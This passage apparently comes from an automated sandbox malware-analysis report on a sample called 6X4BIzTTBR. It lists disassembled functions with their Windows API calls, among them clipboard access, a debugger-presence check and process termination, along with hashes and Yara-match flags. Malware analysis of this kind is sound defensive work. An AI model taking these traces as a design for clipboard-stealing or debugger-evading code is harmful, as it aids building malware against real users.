                                                      • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                      • String ID: 4#E$i
                                                      • API String ID: 4246938166-2480119546
                                                      • Opcode ID: 5b51d03d70498e5785afc0acd32a98c695de96e9c46743eca59a432914eae742
                                                      • Instruction ID: 344c873bb541b04699efd8321dcb53af53807009c20303d6608126bd1becff6b
                                                      • Opcode Fuzzy Hash: 5b51d03d70498e5785afc0acd32a98c695de96e9c46743eca59a432914eae742
                                                      • Instruction Fuzzy Hash: C4510370D00385DAE311DFA4ED45BED7B64FF2A306F045229D901A6162FBB0AA85C769
                                                      Function 046D236E Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 046D23A9
                                                      • GetClientRect.USER32(?,?), ref: 046D23BE
                                                      • GetDC.USER32(?), ref: 046D23C5
                                                      • CreateSolidBrush.GDI32(00646464), ref: 046D23D8
                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 046D23F7
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 046D2418
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 046D2423
                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 046D242C
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 046D2450
                                                      • SetBkMode.GDI32(?,00000001), ref: 046D24DB
                                                      • _wcslen.LIBCMT ref: 046D24F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 1529870607-0
                                                      • Opcode ID: ae682b964db87196fcbae5751d0d0eb42e216528ddf26e84c8a3043db836e210
                                                      • Instruction ID: 2e46ad7a4424fa7feb0c8910a10892eb2058959de024ab42d21b36dae69fd42d
                                                      • Opcode Fuzzy Hash: ae682b964db87196fcbae5751d0d0eb42e216528ddf26e84c8a3043db836e210
                                                      • Instruction Fuzzy Hash: 8871EC72900218AFDB229F68DD85FAEB7BCEB09715F0041A5F609E6155DA70AF80CF14
                                                      Function 0043B77E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA9D,?,00000000), ref: 0043B817
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA9D,?,00000000), ref: 0043B840
                                                      • GetACP.KERNEL32(?,?,0043BA9D,?,00000000), ref: 0043B855
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction ID: 248aba83eae64925ddcefa3866af59446adb897276384782e7e2bc649b3b24e4
                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction Fuzzy Hash: 8321A422A00104A6D739AF14C801BA773AAEF98F50F56946AEA09DB210E736DE41C7D8
                                                      Function 0470B9E5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0470BD04,?,00000000), ref: 0470BA7E
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0470BD04,?,00000000), ref: 0470BAA7
                                                      • GetACP.KERNEL32(?,?,0470BD04,?,00000000), ref: 0470BABC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction ID: ca43e8098e60e5a497535435f10aecddea60617ed5cb6f0816dee3181132be9e
                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction Fuzzy Hash: AC212CA2B02205EAD7348FA5D901AA772E6AF44F50B56C564E90AD7391FB32FB40D350
                                                      Function 0043B952 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F49
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F56
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA5E
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0043BAB9
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAC8
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,004307C5,00000040,?,004308E5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB10
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00430845,00000040), ref: 0043BB2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                      • String ID:
                                                      • API String ID: 2287132625-0
                                                      • Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                      • Instruction ID: ae18054f5e49687ad800b44d63d8f6433ac7786c5dbeca376dbf85f879a44531
                                                      • Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                      • Instruction Fuzzy Hash: B6516171A00605ABDB10EFA5CC45BBF77B8EF4D700F14556BEA04E7290E778DA048BA9
                                                      Function 0470BBB9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 047021B0
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021BD
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0470BCC5
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0470BD20
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0470BD2F
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,04700A2C,00000040,?,04700B4C,00000055,00000000,?,?,00000055,00000000), ref: 0470BD77
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,04700AAC,00000040), ref: 0470BD96
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                      • String ID:
                                                      • API String ID: 2287132625-0
                                                      • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                      • Instruction ID: 8ad72cfc96cd1bb8466a152e95d4b61d12ca639ef66056833abaf8ea351c0339
                                                      • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                      • Instruction Fuzzy Hash: 03517F75A01209EAEB10DFE5CC44ABB77F8AF04704F448469E921E72D0EB71FB488B61
                                                      Function 0043B01A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307CC,?,?,?,?,00430223,?,00000004), ref: 0043B0FC
                                                      • _wcschr.LIBVCRUNTIME ref: 0043B18C
                                                      • _wcschr.LIBVCRUNTIME ref: 0043B19A
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307CC,00000000,004308EC), ref: 0043B23D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                      • String ID:
                                                      • API String ID: 2444527052-0
                                                      • Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                      • Instruction ID: ef2066443028a560883582da2e4683a98ce6f950370b817d639fe92966414bdf
                                                      • Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                      • Instruction Fuzzy Hash: 94610771600206AADB28AB35DC46BBB73A8EF0C754F14146FFA15D7281EB78D940C7E9
                                                      Function 0470B281 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,04700A33,?,?,?,?,0470048A,?,00000004), ref: 0470B363
                                                      • _wcschr.LIBVCRUNTIME ref: 0470B3F3
                                                      • _wcschr.LIBVCRUNTIME ref: 0470B401
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,04700A33,00000000,04700B53), ref: 0470B4A4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                      • String ID:
                                                      • API String ID: 2444527052-0
                                                      • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                      • Instruction ID: 32cadda413d2d31f8c55e508147f1b0238c9acce89f0edfd2b350a15b853273b
                                                      • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                      • Instruction Fuzzy Hash: A561C371602206EAE724ABA5CC45BBA73E8EF04754F54C46AFA45DB3C0EA74F704C7A4
                                                      Function 004351D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430223,?,00000004), ref: 00435223
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: "1@$GetLocaleInfoEx
                                                      • API String ID: 2299586839-4027230933
                                                      • Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                      • Instruction ID: 4ef3139d2eafccabfc8de603cdb2b1e17211f5dab2b19c12cf68fcd39adc0aa6
                                                      • Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                      • Instruction Fuzzy Hash: B8F02B31680318BBDB016F51DC02F6F7B20EF18B12F10006AFC0566290DB798E20AADD
                                                      Function 0043B405 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F49
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F56
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B459
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4AA
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B56A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorInfoLastLocale$_free
                                                      • String ID:
                                                      • API String ID: 2834031935-0
                                                      • Opcode ID: 9404b068eb5bdeb4a2642777d5b5abf2665715f9f507ca32c902d1d9e066e0b2
                                                      • Instruction ID: 4c2f2f5d09be55b05b832ad3edc0e505da86c32581faedaa3da7f61e8e8eacc7
                                                      • Opcode Fuzzy Hash: 9404b068eb5bdeb4a2642777d5b5abf2665715f9f507ca32c902d1d9e066e0b2
                                                      • Instruction Fuzzy Hash: FA61A371501207ABEB289F25CC92BBB77A8EF08314F10507BEE05C6691E77DD952CB98
                                                      Function 0042A3E3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4DB
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4E5
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4F2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                      • Instruction ID: 1ffe323f34a3a55a3528648ac4cbde0bbb52410078db95847d3e69f905ace449
                                                      • Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                      • Instruction Fuzzy Hash: 7331D674901228ABCB21DF25D9887CDB7B8BF08710F5041EAE81CA7251EB749F958F49
                                                      Function 046FA64A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,046DDAED), ref: 046FA742
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,046DDAED), ref: 046FA74C
                                                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,046DDAED), ref: 046FA759
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                      • Instruction ID: e74c441684f267837ce137ae215940340fe329393ca6f4fe6432a0c96376b29d
                                                      • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                      • Instruction Fuzzy Hash: 8331C57590122C9BDB21DF64DD88B9DBBB8FF18710F5081EAE50CA7250E770AB858F48
                                                      Function 0042FE6F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000003,?,0042FE45,00000003,00457970,0000000C,0042FF9C,00000003,00000002,00000000,?,0042DFCF,00000003), ref: 0042FE90
                                                      • TerminateProcess.KERNEL32(00000000,?,0042FE45,00000003,00457970,0000000C,0042FF9C,00000003,00000002,00000000,?,0042DFCF,00000003), ref: 0042FE97
                                                      • ExitProcess.KERNEL32 ref: 0042FEA9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                      • Instruction ID: c804417cfec772e786bbd29e8eae1188b5a535e7b6e0c8a185264ee5462c8a5d
                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                      • Instruction Fuzzy Hash: D3E04F31100154AFCF126F54DD0894A3B39FF01B46F850835F80547636CB39ED42CB58
                                                      Function 047000D6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,?,047000AC,00000000,00457970,0000000C,04700203,00000000,00000002,00000000), ref: 047000F7
                                                      • TerminateProcess.KERNEL32(00000000,?,047000AC,00000000,00457970,0000000C,04700203,00000000,00000002,00000000), ref: 047000FE
                                                      • ExitProcess.KERNEL32 ref: 04700110
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                      • Instruction ID: 1e14661b2828916a857f198c89372e584d11993f33a381bf97aa16fa7f62d420
                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                      • Instruction Fuzzy Hash: B4E0B675002288EBCF11AF54ED4CA593BA9FB46A66B108024F9458B2A1CB75EA42DB44
                                                      Function 046D092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$GetProcAddress.$l
                                                      • API String ID: 0-2784972518
                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                      • Instruction ID: d2c6386fc892db8a559272658b62264718f4d64581039a85038a2992893b8475
                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                      • Instruction Fuzzy Hash: D5314CB6900609DFEB10CF99C880AAEBBF5FF48328F15504AD541AB354E771FA45CBA4
                                                      Function 04705437 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0470048A,?,00000004), ref: 0470548A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: "1@
                                                      • API String ID: 2299586839-1946750398
                                                      • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                      • Instruction ID: c40849ab547c3185235a8382802762518a2036479a2b7db2beaae5f6ca038702
                                                      • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                      • Instruction Fuzzy Hash: 3DF09631A41318FBEB05DF60DC05F6E7B65EF04B12F104155FD0566290DA71A920AA99
                                                      Function 0042EAF0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                      • Instruction ID: 16981e13429911f1b1093344a92db338b10a9ce1b205a054a8a51e488d53c855
                                                      • Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                      • Instruction Fuzzy Hash: CE024D71F002299BDF14CFAAD9806AEBBF1EF48314F65416AD819EB380D735AD41CB94
                                                      Function 046FED57 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                      • Instruction ID: dad748859c95cda0400dac91645520d75180e28c6f8ee860323adf61a09b49ad
                                                      • Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                      • Instruction Fuzzy Hash: 5E024D71E012199FDF18CFA9CC806ADBBF1EF48314F15826ADA59E7390E731A901CB94
                                                      Function 046D2612 Relevance: 3.1, APIs: 2, Instructions: 129nativewindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 046D2639
                                                      • PostQuitMessage.USER32(00000000), ref: 046D27DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageNtdllPostProc_QuitWindow
                                                      • String ID:
                                                      • API String ID: 4264772764-0
                                                      • Opcode ID: 82f44b76c14ec8efbf4c7d3be5e983ce5a0703e3b5b257b4754238f4299c4704
                                                      • Instruction ID: ef98deb499c666cf88a1a7e849a90827108dd7f58b395b56bc0729183502c970
                                                      • Opcode Fuzzy Hash: 82f44b76c14ec8efbf4c7d3be5e983ce5a0703e3b5b257b4754238f4299c4704
                                                      • Instruction Fuzzy Hash: E6410D15A64384A5E730EFA5BC55B2537B0FF64762F10253BE528CB2B2E3A28580C75E
                                                      Function 00436CCF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CCA,?,?,00000008,?,?,0043F18B,00000000), ref: 00436EFC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                      • Instruction ID: 3e854a5e4b8ee01f845dfaca4af397e333297cbb208ec1b1c1cb8abd27174e3c
                                                      • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                      • Instruction Fuzzy Hash: 9CB15D35210609AFD715CF28C48AB557BE0FF09364F26C659E899CF2A1C339D992CB44
                                                      Function 04706F36 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04706F31,?,?,00000008,?,?,0470F3F2,00000000), ref: 04707163
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                      • Instruction ID: 6b9f6d20950e6a94a141e2cb998d8e79812b28334069ea671f8298af0f3ba31f
                                                      • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                      • Instruction Fuzzy Hash: A8B1F331611609DFD719CF28C48AA657BE1FB45364F25CA58E89ACF2E1C336F992CB40
                                                      Function 0043B655 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F49
